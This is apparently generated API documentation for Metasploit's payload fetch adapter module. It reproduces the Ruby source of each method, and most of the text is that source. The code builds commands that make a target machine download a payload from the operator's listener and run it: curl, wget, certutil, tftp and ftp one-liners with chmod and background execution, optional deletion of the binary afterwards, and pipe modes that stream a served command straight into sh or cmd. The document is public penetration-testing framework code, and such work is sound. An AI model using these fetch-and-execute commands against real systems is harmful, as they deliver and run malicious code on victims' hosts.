Module: Msf::Payload::Adapter::Fetch

Includes:

Fileless

Included in:

HTTP, Https, SMB, TFTP

Defined in:

lib/msf/core/payload/adapter/fetch.rb

Defined Under Namespace

Modules: Fileless, HTTP, Https, LinuxOptions, SMB, TFTP, WindowsOptions

Instance Method Summary

• #_check_tftp_file ⇒ void

  Validates that the TFTP client can save the fetched file using the requested destination semantics.

• #_check_tftp_port ⇒ void

  Validates that the TFTP listener is configured to use a reachable port for clients that only support port 69.

• #_determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s) ⇒ Rex::Socket::Comm

  copied from github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/socket_server.rb.

• #_download_pipe ⇒ String

  Returns the pipe download URI used when serving commands over FETCH_PIPE.

• #_execute_add(get_file_cmd) ⇒ String

  Appends the platform-specific execution sequence to a fetch command.

• #_execute_nix(get_file_cmd) ⇒ String

  Appends POSIX execution and optional cleanup behavior to the supplied fetch command, including fileless execution modes when configured.

• #_execute_win(get_file_cmd) ⇒ String

  Appends Windows execution and optional cleanup behavior to the supplied fetch command.

• #_generate_certutil_command ⇒ String

  Builds a certutil-based command line for fetching the payload on Windows.

• #_generate_curl_command ⇒ String

  Builds a curl-based command line for fetching the payload.

• #_generate_curl_pipe ⇒ String

  Builds a curl command that streams a served command directly into a shell.

• #_generate_ftp_command ⇒ String

  Builds an ftp command line for fetching the payload.

• #_generate_get_command ⇒ String

  Builds a GET-based command line for fetching the payload.

• #_generate_get_pipe ⇒ String

  Builds a GET command that streams a served command directly into a shell.

• #_generate_tftp_command ⇒ String

  Builds a tftp command line for fetching the payload, including Linux fileless handling when supported.

• #_generate_tnftp_command ⇒ String

  Builds a tnftp command line for fetching the payload.

• #_generate_wget_command ⇒ String

  Builds a wget-based command line for fetching the payload.

• #_generate_wget_pipe ⇒ String

  Builds a wget command that streams a served command directly into a shell.

• #_remote_destination ⇒ String

  Returns the platform-appropriate destination path used by download commands.

• #_remote_destination_nix ⇒ String

  Returns or memoizes the remote payload destination for POSIX targets.

• #_remote_destination_win ⇒ String

  Returns or memoizes the remote payload destination for Windows targets.

• #default_srvuri(extra_data = nil) ⇒ String

  If no fetch URL is provided, we generate one based off the underlying payload data This is because if we use a randomly-generated URI, the URI generated by venom and Framework will not match.

• #download_uri ⇒ String

  Returns the payload download URI served by the fetch listener.

• #fetch_bindhost ⇒ String

  Returns the interface the fetch service should bind to.

• #fetch_bindnetloc ⇒ String

  Returns the authority string used by the fetch listener socket.

• #fetch_bindport ⇒ Integer

  Returns the TCP port the fetch service should bind to.

• #generate(opts = {}) ⇒ String

  Builds an adapted payload executable, starts any required pipe command state, and returns the remote command that should fetch and execute the payload.

• #generate_fetch_commands ⇒ String

  Dispatches command generation to the selected FETCH_COMMAND helper.

• #generate_payload_uuid(conf = {}) ⇒ PayloadUUID

  Generates a payload UUID using the adapted platform and architecture by default.

• #generate_pipe_command ⇒ String

  Builds the fetch command used to execute a payload directly from a pipe.

• #generate_stage(opts = {}) ⇒ String

  Generates the stage using the adapted architecture when one is not explicitly provided.

• #handle_connection(conn, opts = {}) ⇒ Object

  Handles a new incoming connection while ensuring the adapted architecture is supplied to the parent implementation.

• #initialize(*args) ⇒ void

  Initializes the fetch adapter state and registers datastore options used to stage and serve the adapted payload.

• #linux? ⇒ Boolean

  Indicates whether the adapted payload targets Linux.

• #pipe_srvuri ⇒ String

  Returns the URI path used when serving commands through FETCH_PIPE.

• #pipe_supported_binaries ⇒ Array<String>

  Lists supported binaries that can execute commands piped directly from the fetch server.

• #srvhost ⇒ String

  Returns the configured host used to serve the adapted payload.

• #srvnetloc ⇒ String

  Returns the authority string for the payload fetch service.

• #srvport ⇒ Integer

  Returns the configured port used to serve the adapted payload.

• #srvuri ⇒ String

  Returns the URI path used to serve the payload or a deterministic default when one has not been explicitly configured.

• #windows? ⇒ Boolean

  Indicates whether the adapted payload targets Windows.

Methods included from Fileless

#_generate_fileless_bash_search, #_generate_fileless_python, #_generate_fileless_shell, #_generate_first_stage_shellcode, #_generate_jmp_instruction

Instance Method Details

#_check_tftp_file ⇒ void

This method returns an undefined value.

Validates that the TFTP client can save the fetched file using the requested destination semantics.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 302

def _check_tftp_file
  # Older Linux tftp clients do not support saving the file under a different name
  unless datastore['FETCH_WRITABLE_DIR'].blank? && datastore['FETCH_FILENAME'].blank?
    print_error('The Linux TFTP client does not support saving a file under a different name than the URI.')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_WRITABLE_DIR and FETCH_FILENAME must be blank when using the tftp client')
  end
end

#_check_tftp_port ⇒ void

This method returns an undefined value.

Validates that the TFTP listener is configured to use a reachable port for clients that only support port 69.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 290

def _check_tftp_port
  # Most tftp clients do not have configurable ports
  if datastore['FETCH_SRVPORT'] != 69 && datastore['FetchListenerBindPort'].blank?
    print_error('The TFTP client can only connect to port 69; to start the server on a different port use FetchListenerBindPort and redirect the connection.')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVPORT must be set to 69 when using the tftp client')
  end
end

#_determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s) ⇒ Rex::Socket::Comm

copied from github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/socket_server.rb

Parameters:

• ip (String, nil) —

  The listener IP address used to infer the best communication channel.

• srv_comm (String) (defaults to: datastore['ListenerComm'].to_s) —

  The requested listener communication channel.

Returns:

• (Rex::Socket::Comm) —

  The resolved communication object.

Raises:

• (RuntimeError) —

  If an explicitly requested session comm is invalid.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 316

def _determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s)
  comm = nil

  case srv_comm
  when 'local'
    comm = ::Rex::Socket::Comm::Local
  when /\A-?[0-9]+\Z/
    comm = framework.sessions.get(srv_comm.to_i)
    raise("Socket Server Comm (Session #{srv_comm}) does not exist") unless comm
    raise("Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm
  when nil, ''
    unless ip.nil?
      comm = Rex::Socket::SwitchBoard.best_comm(ip)
    end
  else
    raise("SocketServer Comm '#{srv_comm}' is invalid")
  end

  comm || ::Rex::Socket::Comm::Local
end

#_download_pipe ⇒ String

Returns the pipe download URI used when serving commands over FETCH_PIPE.

Returns:

• (String) —

  The URI path and authority for the piped command payload.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 86

def _download_pipe
  "#{srvnetloc}/#{@pipe_uri}"
end

#_execute_add(get_file_cmd) ⇒ String

Appends the platform-specific execution sequence to a fetch command.

Parameters:

• get_file_cmd (String) —

  The command that retrieves the payload.

Returns:

• (String) —

  The command updated to execute the payload after download.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 341

def _execute_add(get_file_cmd)
  return _execute_win(get_file_cmd) if windows?

  return _execute_nix(get_file_cmd)
end

#_execute_nix(get_file_cmd) ⇒ String

Appends POSIX execution and optional cleanup behavior to the supplied fetch command, including fileless execution modes when configured.

Parameters:

• get_file_cmd (String) —

  The command that retrieves the payload.

Returns:

• (String) —

  The command updated for POSIX execution.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 363

def _execute_nix(get_file_cmd)
  return _generate_fileless_shell(get_file_cmd, module_info['AdaptedArch']) if datastore['FETCH_FILELESS'] == 'shell'
  return _generate_fileless_bash_search(get_file_cmd) if datastore['FETCH_FILELESS'] == 'shell-search'
  return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS'] == 'python3.8+'


  cmds = get_file_cmd
  cmds << ";chmod +x #{_remote_destination_nix}"
  cmds << ";#{_remote_destination_nix}&"
  cmds << "sleep #{rand(3..7)};rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
  cmds
end

#_execute_win(get_file_cmd) ⇒ String

Appends Windows execution and optional cleanup behavior to the supplied fetch command.

Parameters:

• get_file_cmd (String) —

  The command that retrieves the payload.

Returns:

• (String) —

  The command updated for Windows execution.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 352

def _execute_win(get_file_cmd)
  cmds = " & start /B #{_remote_destination_win}"
  cmds << " & del #{_remote_destination_win}" if datastore['FETCH_DELETE']
  get_file_cmd << cmds
end

#_generate_certutil_command ⇒ String

Builds a certutil-based command line for fetching the payload on Windows.

Returns:

• (String) —

  The certutil fetch-and-execute command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 379

def _generate_certutil_command
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "certutil -urlcache -f http://#{download_uri} #{_remote_destination}"
  when 'HTTPS'
    # I don't think there is a way to disable cert check in certutil....
    print_error('CERTUTIL binary does not support insecure mode')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using CERTUTIL')
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_curl_command ⇒ String

Builds a curl-based command line for fetching the payload.

Returns:

• (String) —

  The curl fetch-and-execute command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 396

def _generate_curl_command
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "curl -so #{_remote_destination} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "curl -sko #{_remote_destination} https://#{download_uri}"
  when 'TFTP'
    get_file_cmd = "curl -so #{_remote_destination} tftp://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_curl_pipe ⇒ String

Builds a curl command that streams a served command directly into a shell.

Returns:

• (String) —

  The curl pipe command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 413

def _generate_curl_pipe
  execute_cmd = 'sh'
  execute_cmd = 'cmd' if windows?
  case fetch_protocol
  when 'HTTP'
    return "curl -s http://#{_download_pipe}|#{execute_cmd}"
  when 'HTTPS'
    return "curl -sk https://#{_download_pipe}|#{execute_cmd}"
  else
    fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
  end
end

#_generate_ftp_command ⇒ String

Builds an ftp command line for fetching the payload.

Returns:

• (String) —

  The ftp fetch-and-execute command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 472

def _generate_ftp_command
  case fetch_protocol
  when 'FTP'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} https://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_get_command ⇒ String

Builds a GET-based command line for fetching the payload.

Returns:

• (String) —

  The GET fetch-and-execute command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 429

def _generate_get_command
  # Specifying the method (-m GET) is necessary on OSX
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "GET -m GET http://#{download_uri}>#{_remote_destination}"
  when 'HTTPS'
    # There is no way to disable cert check in GET ...
    print_error('GET binary does not support insecure mode')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
    get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
  when 'FTP'
    get_file_cmd = "GET ftp://#{download_uri}>#{_remote_destination}"
  else
    fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
  end
  _execute_add(get_file_cmd)
end

#_generate_get_pipe ⇒ String

Builds a GET command that streams a served command directly into a shell.

Returns:

• (String) —

  The GET pipe command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 450

def _generate_get_pipe
  # Specifying the method (-m GET) is necessary on OSX
  execute_cmd = 'sh'
  execute_cmd = 'cmd' if windows?
  case fetch_protocol
  when 'HTTP'
    return "GET -m GET http://#{_download_pipe}|#{execute_cmd}"
  when 'HTTPS'
    # There is no way to disable cert check in GET ...
    print_error('GET binary does not support insecure mode')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
    return "GET -m GET https://#{_download_pipe}|#{execute_cmd}"
  when 'FTP'
    return "GET ftp://#{_download_pipe}|#{execute_cmd}"
  else
    fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
  end
end

#_generate_tftp_command ⇒ String

Builds a tftp command line for fetching the payload, including Linux fileless handling when supported.

Returns:

• (String) —

  The tftp fetch-and-execute command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 490

def _generate_tftp_command
  _check_tftp_port
  case fetch_protocol
  when 'TFTP'
    if windows?
      fetch_command = _execute_win("tftp -i #{srvhost} GET #{srvuri} #{_remote_destination}")
    else
      _check_tftp_file
      if datastore['FETCH_FILELESS'] != 'none' && linux?
        return _generate_fileless("(echo binary ; echo get #{srvuri} $f ) | tftp #{srvhost}")
      else
        fetch_command = "(echo binary ; echo get #{srvuri} ) | tftp #{srvhost}; chmod +x ./#{srvuri}; ./#{srvuri} &"
      end
    end
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  fetch_command
end

#_generate_tnftp_command ⇒ String

Builds a tnftp command line for fetching the payload.

Returns:

• (String) —

  The tnftp fetch-and-execute command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 513

def _generate_tnftp_command
  case fetch_protocol
  when 'FTP'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_wget_command ⇒ String

Builds a wget-based command line for fetching the payload.

Returns:

• (String) —

  The wget fetch-and-execute command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 530

def _generate_wget_command
  case fetch_protocol
  when 'HTTPS'
    get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end

  _execute_add(get_file_cmd)
end

#_generate_wget_pipe ⇒ String

Builds a wget command that streams a served command directly into a shell.

Returns:

• (String) —

  The wget pipe command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 546

def _generate_wget_pipe
  case fetch_protocol
  when 'HTTPS'
    return "wget --no-check-certificate -qO- https://#{_download_pipe}|sh"
  when 'HTTP'
    return "wget -qO- http://#{_download_pipe}|sh"
  else
    fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
  end
end

#_remote_destination ⇒ String

Returns the platform-appropriate destination path used by download commands.

Returns:

• (String) —

  The payload destination path.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 561

def _remote_destination
  return _remote_destination_win if windows?

  return _remote_destination_nix
end

#_remote_destination_nix ⇒ String

Returns or memoizes the remote payload destination for POSIX targets.

Returns:

• (String) —

  The POSIX destination path or fileless placeholder.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 570

def _remote_destination_nix
  return @remote_destination_nix unless @remote_destination_nix.nil?

  if datastore['FETCH_FILELESS'] != 'none'
    @remote_destination_nix = '$f'
  else
    writable_dir = datastore['FETCH_WRITABLE_DIR']
    writable_dir = '.' if writable_dir.blank?
    writable_dir += '/' unless writable_dir[-1] == '/'
    payload_filename = datastore['FETCH_FILENAME']
    payload_filename = srvuri if payload_filename.blank?
    payload_path = writable_dir + payload_filename
    @remote_destination_nix = payload_path
  end
  @remote_destination_nix
end

#_remote_destination_win ⇒ String

Returns or memoizes the remote payload destination for Windows targets.

Returns:

• (String) —

  The Windows destination path.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 590

def _remote_destination_win
  return @remote_destination_win unless @remote_destination_win.nil?

  writable_dir = datastore['FETCH_WRITABLE_DIR']
  writable_dir += '\\' unless writable_dir.blank? || writable_dir[-1] == '\\'
  payload_filename = datastore['FETCH_FILENAME']
  payload_filename = srvuri if payload_filename.blank?
  payload_path = writable_dir + payload_filename
  payload_path += '.exe' unless payload_path[-4..] == '.exe'
  @remote_destination_win = payload_path
  @remote_destination_win
end

#default_srvuri(extra_data = nil) ⇒ String

If no fetch URL is provided, we generate one based off the underlying payload data This is because if we use a randomly-generated URI, the URI generated by venom and Framework will not match. This way, we can build a payload in venom and a listener in Framework, and if the underlying payload type/host/port are the same, the URI will be, too.

Parameters:

• extra_data (String, nil) (defaults to: nil) —

  Additional data to incorporate into the generated URI hash.

Returns:

• (String) —

  A stable URI-safe identifier for the served payload.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 46

def default_srvuri(extra_data = nil)
  # If we're in framework, payload is in datastore; msfvenom has it in refname
  payload_name = datastore['payload'] ||= refname
  decoded_uri = payload_name.dup
  # there may be no transport, so leave the connection string off if that's the case
  netloc = ''
  if module_info['ConnectionType'].upcase == 'REVERSE' || module_info['ConnectionType'].upcase == 'TUNNEL'
    netloc << datastore['LHOST'] unless datastore['LHOST'].blank?
    unless datastore['LPORT'].blank?
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{datastore['LPORT']}"
      else
        netloc = "#{netloc}:#{datastore['LPORT']}"
      end
    end
  elsif module_info['ConnectionType'].upcase == 'BIND'
    netloc << datastore['LHOST'] unless datastore['LHOST'].blank?
    unless datastore['RPORT'].blank?
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{datastore['RPORT']}"
      else
        netloc = "#{netloc}:#{datastore['RPORT']}"
      end
    end
  end
  decoded_uri << ";#{netloc}"
  decoded_uri << ";#{extra_data}" unless extra_data.nil?
  Base64.urlsafe_encode64(OpenSSL::Digest::MD5.new(decoded_uri).digest, padding: false)
end

#download_uri ⇒ String

Returns the payload download URI served by the fetch listener.

Returns:

• (String) —

  The URI path and authority for the generated payload.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 79

def download_uri
  "#{srvnetloc}/#{srvuri}"
end

#fetch_bindhost ⇒ String

Returns the interface the fetch service should bind to.

Returns:

• (String) —

  The bind address for the local fetch listener.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 93

def fetch_bindhost
  datastore['FetchListenerBindAddress'].blank? ? srvhost : datastore['FetchListenerBindAddress']
end

#fetch_bindnetloc ⇒ String

Returns the authority string used by the fetch listener socket.

Returns:

• (String) —

  The host:port pair for the fetch listener.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 107

def fetch_bindnetloc
  Rex::Socket.to_authority(fetch_bindhost, fetch_bindport)
end

#fetch_bindport ⇒ Integer

Returns the TCP port the fetch service should bind to.

Returns:

• (Integer) —

  The bind port for the local fetch listener.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 100

def fetch_bindport
  datastore['FetchListenerBindPort'].blank? ? srvport : datastore['FetchListenerBindPort']
end

#generate(opts = {}) ⇒ String

Builds an adapted payload executable, starts any required pipe command state, and returns the remote command that should fetch and execute the payload.

Parameters:

• opts (Hash) (defaults to: {}) —

  Payload generation options.

Returns:

• (String) —

  The fetch command to run on the target.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 126

def generate(opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  opts[:code] = super
  @srvexe = generate_payload_exe(opts)
  if datastore['FETCH_PIPE']
    unless pipe_supported_binaries.include?(datastore['FETCH_COMMAND'].upcase)
      fail_with(Msf::Module::Failure::BadConfig, "Unsupported binary selected for FETCH_PIPE option: #{datastore['FETCH_COMMAND']}, must be one of #{pipe_supported_binaries}.")
    end
    @pipe_cmd = generate_fetch_commands
    @pipe_cmd << "\n" if windows? #need CR when we pipe command in Windows
    vprint_status("Command served: #{@pipe_cmd}")
    cmd = generate_pipe_command
  else
    cmd = generate_fetch_commands
  end
  vprint_status("Command to run on remote host: #{cmd}")
  cmd
end

#generate_fetch_commands ⇒ String

Dispatches command generation to the selected FETCH_COMMAND helper.

Returns:

• (String) —

  The generated fetch-and-execute command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 167

def generate_fetch_commands
  # TODO: Make a check method that determines if we support a platform/server/command combination
  #
  case datastore['FETCH_COMMAND'].upcase
  when 'FTP'
    return _generate_ftp_command
  when 'TNFTP'
    return _generate_tnftp_command
  when 'WGET'
    return _generate_wget_command
  when 'GET'
    return _generate_get_command
  when 'CURL'
    return _generate_curl_command
  when 'TFTP'
    return _generate_tftp_command
  when 'CERTUTIL'
    return _generate_certutil_command
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
end

#generate_payload_uuid(conf = {}) ⇒ PayloadUUID

Generates a payload UUID using the adapted platform and architecture by default.

Parameters:

• conf (Hash) (defaults to: {}) —

  UUID generation options.

Returns:

• (PayloadUUID) —

  The generated payload UUID.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 205

def generate_payload_uuid(conf = {})
  conf[:arch] ||= module_info['AdaptedArch']
  conf[:platform] ||= module_info['AdaptedPlatform']
  super
end

#generate_pipe_command ⇒ String

Builds the fetch command used to execute a payload directly from a pipe.

Returns:

• (String) —

  The pipe-based execution command.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 148

def generate_pipe_command
  # TODO: Make a check method that determines if we support a platform/server/command combination
  @pipe_uri = pipe_srvuri

  case datastore['FETCH_COMMAND'].upcase
  when 'WGET'
    return _generate_wget_pipe
  when 'GET'
    return _generate_get_pipe
  when 'CURL'
    return _generate_curl_pipe
  else
    fail_with(Msf::Module::Failure::BadConfig, "Unsupported binary selected for FETCH_PIPE option: #{datastore['FETCH_COMMAND']}, must be one of #{pipe_supported_binaries}.")
  end
end

#generate_stage(opts = {}) ⇒ String

Generates the stage using the adapted architecture when one is not explicitly provided.

Parameters:

• opts (Hash) (defaults to: {}) —

  Stage generation options.

Returns:

• (String) —

  The generated stage contents.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 195

def generate_stage(opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  super
end

#handle_connection(conn, opts = {}) ⇒ Object

Handles a new incoming connection while ensuring the adapted architecture is supplied to the parent implementation.

Parameters:

• conn (Object) —

  The connection object being handled.

• opts (Hash) (defaults to: {}) —

  Connection handling options.

Returns:

• (Object) —

  The result from the parent handler.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 217

def handle_connection(conn, opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  super
end

#initialize(*args) ⇒ void

Initializes the fetch adapter state and registers datastore options used to stage and serve the adapted payload.

Parameters:

• args (Array) —

  Arguments forwarded to the parent payload initializer.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 9

def initialize(*args)
  super
  register_options(
    [
      Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
      Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
      # FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
      Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
      Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
    ]
  )
  register_advanced_options(
    [
      Msf::OptAddress.new('FetchListenerBindAddress', [ false, 'The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST']),
      Msf::OptPort.new('FetchListenerBindPort', [false, 'The port to bind to if different from FETCH_SRVPORT']),
      Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false])
    ]
  )
  @fetch_service = nil
  @myresources = []
  @srvexe = ''
  @pipe_uri = nil
  @pipe_cmd = nil
  @remote_destination_win = nil
  @remote_destination_nix = nil
  @windows = nil
end

#linux? ⇒ Boolean

Indicates whether the adapted payload targets Linux.

Returns:

• (Boolean) —

  True when the first adapted platform is Linux.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 279

def linux?
  return @linux unless @linux.nil?

  @linux = platform.platforms.first == Msf::Module::Platform::Linux
  @linux
end

#pipe_srvuri ⇒ String

Returns the URI path used when serving commands through FETCH_PIPE.

Returns:

• (String) —

  The pipe command URI path.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 260

def pipe_srvuri
  return datastore['FETCH_URIPATH'] unless datastore['FETCH_URIPATH'].blank?

  default_srvuri('pipe')
end

#pipe_supported_binaries ⇒ Array<String>

Lists supported binaries that can execute commands piped directly from the fetch server.

Returns:

• (Array<String>) —

  The set of supported pipe-capable binaries.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 115

def pipe_supported_binaries
  # this is going to expand when we add psh support
  return %w[CURL] if windows?
  %w[WGET GET CURL]
end

#srvhost ⇒ String

Returns the configured host used to serve the adapted payload.

Returns:

• (String) —

  The payload service host.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 225

def srvhost
  host = datastore['FETCH_SRVHOST']
  host = datastore['LHOST'] if host.blank?
  host = '127.127.127.127' if host.blank?
  host
end

#srvnetloc ⇒ String

Returns the authority string for the payload fetch service.

Returns:

• (String) —

  The host:port pair used in generated download URLs.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 235

def srvnetloc
  Rex::Socket.to_authority(srvhost, srvport)
end

#srvport ⇒ Integer

Returns the configured port used to serve the adapted payload.

Returns:

• (Integer) —

  The payload service port.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 242

def srvport
  datastore['FETCH_SRVPORT']
end

#srvuri ⇒ String

Returns the URI path used to serve the payload or a deterministic default when one has not been explicitly configured.

Returns:

• (String) —

  The payload download URI path.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 250

def srvuri
  # If the user has selected FETCH_PIPE, we save any user-defined uri for the pipe command
  return default_srvuri if datastore['FETCH_PIPE'] || datastore['FETCH_URIPATH'].blank?

  datastore['FETCH_URIPATH']
end

#windows? ⇒ Boolean

Indicates whether the adapted payload targets Windows.

Returns:

• (Boolean) —

  True when the first adapted platform is Windows.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 269

def windows?
  return @windows unless @windows.nil?

  @windows = platform.platforms.first == Msf::Module::Platform::Windows
  @windows
end